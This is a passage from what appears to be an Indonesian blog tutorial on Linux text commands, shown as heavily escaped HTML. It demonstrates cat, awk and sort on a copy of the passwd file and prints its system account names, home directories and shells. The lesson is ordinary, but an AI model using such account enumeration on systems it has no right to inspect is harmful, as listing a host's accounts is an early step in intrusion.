background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;messagebus:x:104:112::/var/run/dbus:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;nobody:x:65534:65534:nobody:/nonexistent:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;mysql:x:105:113::/var/lib/mysql:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;avahi:x:106:114::/var/run/avahi-daemon:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;snort:x:107:115:Snort IDS:/var/log/snort:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;statd:x:108:65534::/var/lib/nfs:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;usbmux:x:109:46::/home/usbmux:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;pulse:x:110:116::/var/run/pulse:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;rtkit:x:111:117::/proc:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;festival:x:112:29::/home/festival:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;postgres:x:1000:1000::/home/postgres:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;couchdb:x:113:121:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vviGSm5XewU/TyoEP2jTlTI/AAAAAAAABL8/DIEVYPLIpMo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="259" src="http://1.bp.blogspot.com/-vviGSm5XewU/TyoEP2jTlTI/AAAAAAAABL8/DIEVYPLIpMo/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="color: cyan; font-family: monospace;"&gt;&lt;i&gt;menggunakan perintah cat&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini saya akan mencetak isi dari file passwd.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;4. Perintah awk&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;AWK adalah perintah untuk mencari string dalam sebuah file. Berbeda dengan grep, awk memiliki hasil yang lebih spesifik.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: white; font-size: 13px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;/span&gt;&amp;nbsp;awk -F ':' '{print $1}' passwd&amp;nbsp;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;root&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;daemon&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;bin&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sys&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sync&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;games&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;man&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;lp&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;mail&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;news&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;uucp&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;proxy&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www-data&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;backup&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;list&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;irc&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;gnats&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;libuuid&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;syslog&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sshd&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;landscape&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;messagebus&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;nobody&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;mysql&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;avahi&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;snort&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;statd&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;usbmux&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;pulse&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;rtkit&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;festival&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;postgres&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;couchdb&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-_8NFL5cw6tk/TyoEdRXRzKI/AAAAAAAABME/tzU7rd1itfU/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://1.bp.blogspot.com/-_8NFL5cw6tk/TyoEdRXRzKI/AAAAAAAABME/tzU7rd1itfU/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="color: cyan; font-family: monospace;"&gt;&lt;i&gt;menggunakan perintah awk&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Keterangan:&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;-F : Penggunaan -F bertujuan untuk menentukan pemisah antara kolom 1 dan kolom 2. Contoh:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;Sebuah file berisi:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;123 456 789&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;Bagian "123" adalah kolom pertama.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;Bagian "456" adalah kolom kedua.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;Bagian "789" adalah kolom ketiga.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;Kolom ini dipisahkan oleh &amp;lt;spasi&amp;gt;. Jika kolom dipisahkan oleh spasi, maka perintah -F tidak lagi diperlukan. Namun jika file berisi:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;123-456-789&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="background-color: black; color: white;"&gt;Maka perintah -F digunakan untuk menentukan pemisah antar kolom. Pada file tersebut, terlihat bahwa setiap kolom dipisahkan oleh simbol "-". Sehingga perintah awk akan ditambah dengan argumen -F '-'.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;5. Perintah sort&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;SORT adalah perintah untuk mengurutkan file berdasarkan alfabet. Penggunaan sort terbagi menjadi dua, yaitu perintah untuk mengolah output dari peritah sebelumnya, dan yang kedua adalah langsung mengurutkan sebuah file tanpa diawali dengan perintah cat atau awk.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Penggunaan sort:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command sort [1]:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# sort &amp;lt;file yang hendak diurutkan&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command sort [2]:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# cat &amp;lt;file yang hendak dicetak&amp;gt; | sort&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perintah sort yang pertama akan mengurutkan file langsung dari file sumber. Sementara perintah sort yang pertama, akan mengurutkan output dari perintah cat.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita akan mengurutkan output dari perintah awk sebelumnya. Terlihat bahwa perintah awk belum mengurutkan hasil secara aflabet.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command :&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;/span&gt;# awk -F ':' '{print $1}' passwd &amp;nbsp;| sort&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;avahi&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;backup&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;bin&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;couchdb&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;daemon&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;festival&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;games&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;gnats&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;irc&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;landscape&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;libuuid&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;list&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;lp&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;mail&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;man&lt;/code&gt;&lt;code style="background-attachment: initial; 